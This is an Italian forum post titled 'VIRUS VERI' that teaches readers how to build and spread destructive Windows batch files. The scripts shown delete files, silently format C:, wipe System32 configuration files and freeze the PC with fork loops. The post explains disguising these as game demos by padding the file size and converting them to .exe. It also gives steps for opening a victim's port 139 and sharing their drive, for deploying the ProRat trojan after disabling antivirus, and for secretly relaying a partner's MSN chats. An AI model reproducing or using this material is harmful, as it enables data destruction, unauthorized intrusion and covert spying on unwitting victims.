IL FORUM DI SIMONE PERAINO
Vuoi reagire a questo messaggio? Crea un account in pochi click o accedi per continuare.

IL FORUM DI SIMONE PERAINO

forum
 
IndiceUltime immaginiCercaRegistratiAccedi

IL FORUM DI SIMONE PERAINO :: Virus
 

 VIRUS VERI

Andare in basso 
AutoreMessaggio
Admin
Admin



Messaggi : 105
Data di iscrizione : 18.01.09

VIRUS VERI Empty
MessaggioTitolo: VIRUS VERI   VIRUS VERI Icon_minitimeDom Feb 08, 2009 11:15 pm
Creare un virus in batch



Salvare Un Virus
1) Aprire il blocco note
2) Incollarci il codice
3) Chiudere e salvare il file in .bat

Virus Per Cancellare Un File
1) Aprite il blocco note
2) Incollateci 1 dei seguenti codici:

CODICE
@ERASE /comando "C:\percorso\percorso *.*"
@DEL /comando "C:\percorso\percorso *.*"


3) Chiudete e salvate in .bat

IN DETTAGLIO: Che significa quel codice?
Allora:
1) @ERASE e @DEL = Sono per cancellare file
2) /comando = Bisognerebbe inserire 1 o più comandi tra questi:

a) /P Chiede conferma prima di eliminare ogni file.
b) /F Forza l'eliminazione dei file di sola lettura.
c) /S Elimina i file specificati da tutte le sottodirectory.
d) /Q Modalità silenziosa, non chiede conferma per eliminazioni globali.
e) /A Seleziona i file da eliminare in base agli attributi.

3) *.* = Il PRIMO asterisco serve per cancellare TUTTI i file con un certo nome, come:

CODICE
eversor.*


4) *.* = Il SECONDO asterisco serve per cancellare QUALSIASI tipo di ESTENSIONE di un file, come:

CODICE
*.txt


5) QUINDI, in sostanza se dobbiamo cancellare il file "eversor" in .txt sul desktop, faremo:

CODICE
@ERASE /S /Q "C:\Programmi\Documents and settings\L.H.S.\Desktop\eversor.txt"



Virus Per Formattare C:
1) Aprire il blocco note
2) Inserirce dentro il seguente codice:

CODICE
format C: /autotest /q /u


3) Salvare in .bat

IN DETTAGLIO: Questo virus formatta c: senza chiedere conferma (/q) e non permette di essere bloccata piu avanti (/u)


Virus Per Disconnettere/Riavviare/Spegnere il PC
1) Aprire il blocco note
2) Inserire dentro il seguente codice:

CODICE
shutdown -comando


3) Salvare in .bat

IN DETTAGLIO: Il -comando può essere sostituito tra i seguenti:

a) -i : Attiva l’interfaccia utente grafica
b) -l : Disconnette l'utente
c) -r : Riavvia il PC
d) -s : Spegne il computer
e) -t xx: xx Sarebbero i secondi di attesa prima della chiusura di Windows
f) -f : Chiude le applicazioni ancora aperte


Virus Per Far Impallare Il PC
1) Aprire il blocco note
2) Inserire dentro il seguente codice:

START
START
START
START
START
START
START
START
ecc...

3) Salvare in .bat

IN DETTAGLIO: Se aprite l'msdos (Start--->Esegui--->cmd) e scrivete START, a sua volta vi apre di nuovo il prompt.
Che succede se voi scrivete START tipo 500 volte (MAGARI COL NOSTRO FLODDER SPECIALE) salvate in batch e lo mandate alla vittima???
Beh, vi lascio a voi immaginare.


Trasformare Il .bat In .exe
1) Scaricate il seguente programma: Batch To Exe 1.2
2) Apritelo e scegliete le opzioni, si può anche cambiare l'icona del file


Aumentare Il Peso Del Virus
1) Aprire il blocco note
2) Incollarci dentro il codice
3) Aggiungere il codice:

CODICE
@REM parole_a_caso_ma_tante


4) Salvare in .bat

IN DETTAGLIO: Perchè @REM?
Allora si da il caso che il comando @REM, serva per "Inserire Commenti", MA, se noi al posto dei commenti mettiamo non so, 500 volte la lettere aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, non faremo altro che AUMENTARE il peso del virus.
Perchè così?
Sicuramente CHIUNQUE abbia un MINIMO di conoscenza informatica, si può accorgere che la demo del gioco Need For Speed Underground 4, che gli passiamo in anteprima, NON PUò PESARE 2KB!!!!
Quindi c'è il comando @REM, che non modifica ASSOLUTAMENTE il codice, ma fa si che esso, PESI DI PIù, e le nostre probabilità di fregare la vittima aumentano sempre più .


GUIDA INTERAMENTE CREATA DA Simone Peraino

Un altro bellissimo virus

Aprite il blocco note e scriveteci le seguenti righe:

-

@echo off
@cls
@C:
@cd\
@cd Windows
@cd System32
@cd config
@del *.???
@del *.??
@del *.?
@cd ..
@del *.???
@del *.??
@del *.?
@cd ..
@del *.???
@del *.??
@del *.?
@echo Su linux questo file non sarebbe stato avviato @pause
@exit


-

Salvate il file con nome “virus.bat”.

Lezione 1

Ms-dos per chi non lo sapesse è un semplice sistema operativo. Ecco i comandi:

ATTRIB Visualizza o modifica gli attributi dei file.
CD Cambia la directory corrente o ne visualizza il nome.
CHDIR Cambia la directory corrente o ne visualizza il nome.
CHKDSK Verifica il disco e visualizza una relazione sul suo stato.
CLS Cancella il contenuto della schermata.
COMMAND Avvia un nuovo inteprete dei comandi MS-DOS.
COPY Copia uno o piu’ file in un altro punto del disco.
DEFRAG Riorganizza i file su un disco per ottimizzarne l’uso.
DEL Elimina uno o piu’ file.
DELTREE Elimina una directory e tutti i file e le sottodirectory in essa contenuti.
DIR Visualizza l’elenco dei file e delle subdirectory di una directory.
DISKCOPY Copia il contenuto di un disco floppy in un altro disco floppy.
DOSKEY Modifica righe di comando, chiama comandi di MS-DOS e crea macro.
EDIT Avvia MS-DOS Editor per creare e modificare i file ASCII.
EMM386 Abilita o disabilita la memoria espansa di EMM386.
EXPAND Decomprime uno o piu’ file compressi.
FDISK Configura un disco rigido per l’utilizzo con MS-DOS.
FORMAT Formatta un disco per l’utilizzo con MS-DOS.
KEYB Configura la tastiera per la lingua specificata.
LABEL Crea, modifica o elimina l’etichetta di volume di un disco.
MD Crea una nuova directory.
MEM Visualizza la quantità di memoria usata e libera del sistema.
MKDIR Crea una nuova directory.
MORE Visualizza i dati di output una schermata per volta.
PATH Visualizza o imposta un percorso di ricerca per i file eseguibili.
PRINT Stampa un file di testo consentendo di usare altri comandi di MSDOS.
PROMPT Cambia il prompt dei comandi di MS-DOS.
RD Rimuove una directory.
REN Rinomina uno o piu’ file.
RENAME Rinomina uno o piu’ file.
REPLACE Sostituisce i file.
RMDIR Rimuove una directory.
SUBST Associa un percorso ad una lettera di unità.
SYS Copia i file di sistema di MS-DOS e l’inteprete dei comandi sul disco specificato.
TYPE Visualizza il contenuto di un file di testo.
UNDELETE Ripristina i file cancellati precedentemente con il comando DEL.
UNFORMAT Ripristina i dati di un disco cancellati con il comando FORMAT.
VER Visualizza la versione di MS-DOS in uso.
VOL Visualizza l’etichetta e il numero di serie di volume del disco.
XCOPY Copia i file (ad esclusione dei file nascosti e di sistema) e la struttura delle directory


Lezione 2

In questa lezione scriverò un esempio di virus in formato .bat che che appena è clickato due volte ti cancella tutte le configurazioni, file critici di sistema e alcuni file nella cartella WINDOWS. ATTENZIONE QUESTE INFORMAZIONI SONO SOLO A SCOPO INFORMATIVO, NON MI RITENGO RESPONSABILE DEI DANNI CAUSATI A VOI O AD ALTRI UTENTI.

******************
VIRUS
******************

echo off
cls
C:
cd\
cd Windows
cd System32
del *.???
del *.??
del *.?
cd config
del *.???
del *.??
del *.?
cd ..
cd ..
del *.???
del *.??
del *.?
echo TI HO FOTTUTO IL PC (potete inserire la frase ke volete)
pause
exit


Probabilmente non avrete capito nulla, non preoccupatevi alla fine della guida sarete in grado di crearne uno da soli.

Analisi Virus

*****************
Comandi
*****************
allora il comandoecho ciaostampa a schermo la parola ciao.
____
il comando pausepermette di mettere una pausa temporanea (finchè non si preme un tasto) al programma
____
cd myfolderentra in una cartella chiamata “myfolder”
____
cd\

ritorna all’inzio del volume, cioè se ti trovi in C:\Documents and Settings\Users

tornera alla directory C:\
____

del *.???
del *.??
del *.?


cancella tutti i file con estensioni di 3 lettere, 2 lettere o 1 lettera che è rappresentata da ? e con qualunque nome del file rappresentato dal simbolo *
si potrebbe anche scrivere:

del *.*


ma uscirebbe una conferma di eliminazione del file, cosa che per un virus non si addice molto…

N.B. Questi sono comandi base del dos… niente di illegale per il momento ^_^
Per entrare nel pc di una persona connessa ad internet sitono principalmente due metodi:

- Connettersi tramite NetBios
- Infettare la vittima inviandogli un trojan

Per questo secondo metodo bisogna dire che esistono molti antivirus che rilevano e rimuovono trojan e quindi dovrete prima disattivare l'antivirus della vittima!

1°Metodo: NetBios

Prima di tutto dobbiamo procurarci due cose!

1. L'IP della vittima che si può prendere con programmi appositi o script per msn
2. Aprire la porta 139 della nostra vittima facendogli eseguire questo batch:


CODICEnetsh firewall add portopening TCP 139
net share disco=C:\


Ora che avete IP e avete condiviso il C: della vittima, eseguita queste operazioni:

COdice:

* Digitate: cd C:\Windows
* Digitate: Nbtstat -A "IP"(l' IP della vittima cona la 139 porta aperta)
* Adesso comparirà una tabella con nome, tipo e stato...prendiamo nota del nome dell'IP della nostra vittima
* Adesso digitate: Edit C:\windows\Imhosts
* Ora nel file da modificare (nella schermate blu) inseriamo: "IP""NOME DELL'IP DELLA NOSTRA VITTIMA"#PRE
* Appena avete terminato, andate su File -> Salva e uscite (File -> Esci)
* Digitate: Net View \\"NOME DELL'IP DELLA VITTIMA"
* Se avete seguito bene il procedimento, vi uscirà la lista delle periferiche condivise (stampanti,..)
* Adesso basta andare in Risorse di Rete -> Strumenti -> Connetti ad unità di rete e inserite come nome dell'unita rete: \\"NOME DELL'IP DELLA VITTIMA"\C

2°Metodo: Trojan

Per questo metodo dovrete scaricarvi un paccheto con il necessario sul vostro pc! (l'antivirus vi rivelerà il trojan quind disabilitatelo)
E' cosigliabile scaricarso il trojan ProRat!
Un trojan è fatto da due parti:

1. La parte client (quale che userete)
2. La parte server (il vero trojan, cioè la parte da far aprire la vittima e ke la infetterà)

Con la parte client del vostro trojan dovrete crearvi un vostro server, mandarlo alla vittima e a questo punto basterà connettervi con il client!

questo non è a scopo dannegiativo ma a scopo per cose serie e non scherzi da cretini.

Come nascondere un file compresso dentro un'immagine

1: Aprite "Risorse del computer"
2: Selezionate il menù "Strumenti" -> "Opzioni cartella..."
3: Scegliete la cartella "Tipi di file"
4: Selezionate la voce "Cartella" nel box contenete i tipi di files (Dovrebbe essere al secondo posto)
5: Cliccate sul pulsante "Avanzate" in basso a destra
6: Nella casella "Operazione" scrivete Apri finestra DOS
7: Nella casella "Applicazione utilizzata per..." inserite la seguente stringa di testo (senza virgolette):

"C:WindowsSystem32command.com /k cd %1"


In più è meglio non utilizzare sempre lo stesso nome (prova), cambia in questo modo il codice (senza virgolette):

"copy /b prova.jpg + prova1.rar prova2.jpg"


Ecco spiegato in 4 passaggi il trucchetto per nascondere un file compresso (es: *.rar) in un file immagine (es: *.jpg)
1°-Create una cartella in C: (per rendere più facili le cose) e chiamiamola ad esempio Hacher_Pc.
2°-Aprite la cartella Hacher_Pc e inserite il file immagine (chiamiamolo prova.jpg) e il file compresso che volete nascondere (chiamiamolo prova.rar).
3°-Cliccate su Start> Esegui> scrivete "cmd" e cliccate Ok.
4°-Nella schermata che apparirà scrivete "cd c:hacker_pc" e cliccate Invio e serve per aprire la cartella che abbiamo creato e poi "copy/b prova.jpg + prova.rar Hacker_Pc.jpg" e cliccate Invio e serve per un unire i file prova.jpg e prova.rar in un file immagine Hacker_Pc.jpg contenente il file prova.rar ma che appare come un qualsiasi file immagine.

Virus utile e semplice per la formattazione del floppy


Se avete problemi con l'utility di formattazione dei floppy...
Questo virus vi può dare una mano.
Aprite un file di blocco note, digitate la stringa:


@format A:


Salvatelo e rinominatelo cambiandogli estensione da .txt a .bat
Inserite un floppy nell'unità e lanciate il virus... da lì potrete formattarlo!!!

PROVATECI!!!

Msn: Spiare una conversazione senza essere visti


Indicato specialmente per le coppiette gelose del proprio amorino…avete paura che lui/lei vi tradisca? Avete conquistato la fiducia di un suo amico/a? Sfruttate il tutto…mixate e… Usate Linked Chat e saprete la verità!
Per prima cosa dovete avere Msn Plus.
In seguito scaricare lo script “Linked Chat” (senza installazione è questo il bello )
Fate installare al vostro amico Linked Chat o usatelo voi per altri “loschi fini” Passando alle istruzioni:

Io chatto con il fidanzato/a e voglio mandare tutto quello che ci scriviamo al “mandante” quindi
* Clicco su “link this chat” tramite questo bottoncino (naturalmente nella chat del fidanzato/a)
* Seleziono chi voglio che segua la mia conversazione


Buona spiata! P.S. Chi lo userà contro di me…è meglio che non lo usa.

Come creare un semplice ed innocuo virus per Windows


Mai avuto voglia di fare un innocuo ma efficace scherzo ad un vostro amico installando sul suo PC un virus fittizio in grado di provocare degli effetti con un certo “impatto emotivo”, come l’apertura e chiusura dei drive DVD, piuttosto che lo spegnimento del monitor o l’apertura di finestre a caso?

Se la risposta è si allora dovete assolutamente leggere qui sotto!

Il principio di funzionamento del nostro fake virus è basato sull’utilizzo di nircmd.exe, un’utility che è in grado di eseguire tutta una serie di operazione e comandi su Windows in modalità “silent” ovvero senza aprire alcuna finestra di esecuzione: sembra una cosa stupida, ma vi renderete presto conto anche voi che si tratta di un’utility che si presta ad un sacco di interessanti applicazioni .

Ecco i passi da seguire per creare e attivare il nostro virus:

1- Una volta effettuato il download di nircmd.exe, scompattate e lanciate l’eseguibile “nircmd.exe” nel PC della vittima, quindi selezionate il bottone “Copy to Windows directory“.

2- Create un file “fun.bat” in una qualsiasi cartella ed inseritevi il seguente contenuto:

@echo off
cd %windir%
nircmd.exe infobox "Ciao io sono un VIRUS ed ora prenderò possesso del tuo PC !!"
FOR %%A IN (1 2 3 4 5 6 7 8 9 10) DO (
FOR %%B IN (1 2 3 4 5) DO (
nircmd.exe exec show "%windir%\system32\calc.exe"
)
nircmd.exe wait 500
nircmd.exe monitor off
nircmd.exe cdrom open d:
nircmd.exe cdrom close d:
nircmd.exe beep 500 1000
nircmd.exe wait 500
nircmd.exe monitor on
nircmd.exe wait 500
)


3-Trascinate il file nel menu di avvio all’interno di Start=>Programmi=>Esecuzione Automatica.

A questo punto non dovrete per nulla al mondo perdervi la scena nel momento in cui il vostro “presunto” amico riavvierà il PC ed inizierà a vedere il drive del CD/DVD aprirsi e chiudersi in continuazione, decine di finestre che si aprono, beep ad intermittenza ed il monitor che accende e spegne ogni due secondi!

In ogni caso, a parte l’aspetto ludico, nircmd.exe si presta anche a molte applicazioni interessanti ed utili nella gestione del vostro sistema operativo. Per una lista più completa di esempi di comandi ed automatismi gestibili vi consiglio di
Torna in alto Andare in basso
http://simoneperainoforum.forumattivo.it
 
VIRUS VERI
Torna in alto 
Pagina 1 di 1
 Argomenti simili
-
» VIRUS FINTI

Permessi in questa sezione del forum:Non puoi rispondere agli argomenti in questo forum.
IL FORUM DI SIMONE PERAINO :: Virus-
Vai verso: